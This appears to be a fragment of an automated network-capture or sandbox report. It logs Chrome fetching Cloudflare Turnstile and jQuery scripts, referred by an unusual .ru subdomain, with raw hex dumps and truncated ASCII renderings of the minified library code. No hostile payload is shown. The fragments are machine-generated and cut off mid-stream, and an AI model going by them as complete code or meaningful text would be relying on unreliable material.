                                                                                        2024-12-18 01:10:28 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                        Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                        2024-12-18 01:10:28 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                        Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                        2024-12-18 01:10:28 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                        Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                        2024-12-18 01:10:28 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                        Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.1649727104.18.94.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:27 UTC648OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://dva.dgkifyron.ru/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:28 UTC386INHTTP/1.1 302 Found
                                                                                        Date: Wed, 18 Dec 2024 01:10:28 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        access-control-allow-origin: *
                                                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b45fa8ae50f85-EWR
                                                                                        alt-svc: h3=":443"; ma=86400


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.1649728104.18.94.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:29 UTC647OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://dva.dgkifyron.ru/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:30 UTC471INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:29 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 47692
                                                                                        Connection: close
                                                                                        accept-ranges: bytes
                                                                                        last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                        access-control-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b4604fd015e7c-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:30 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                        Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                        2024-12-18 01:10:30 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                        Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                        2024-12-18 01:10:30 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                        2024-12-18 01:10:30 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                        2024-12-18 01:10:30 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                        2024-12-18 01:10:30 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                        Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                        2024-12-18 01:10:30 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                        Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                        2024-12-18 01:10:30 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                        Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                        2024-12-18 01:10:30 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                        Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                        2024-12-18 01:10:30 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                        Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.1649729151.101.2.1374436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:30 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                        Host: code.jquery.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:30 UTC615INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 89501
                                                                                        Server: nginx
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                        ETag: "28feccc0-15d9d"
                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Wed, 18 Dec 2024 01:10:30 GMT
                                                                                        Age: 3005762
                                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740069-EWR
                                                                                        X-Cache: HIT, HIT
                                                                                        X-Cache-Hits: 2774, 318
                                                                                        X-Timer: S1734484230.487576,VS0,VE0
                                                                                        Vary: Accept-Encoding
                                                                                        2024-12-18 01:10:30 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                        2024-12-18 01:10:30 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
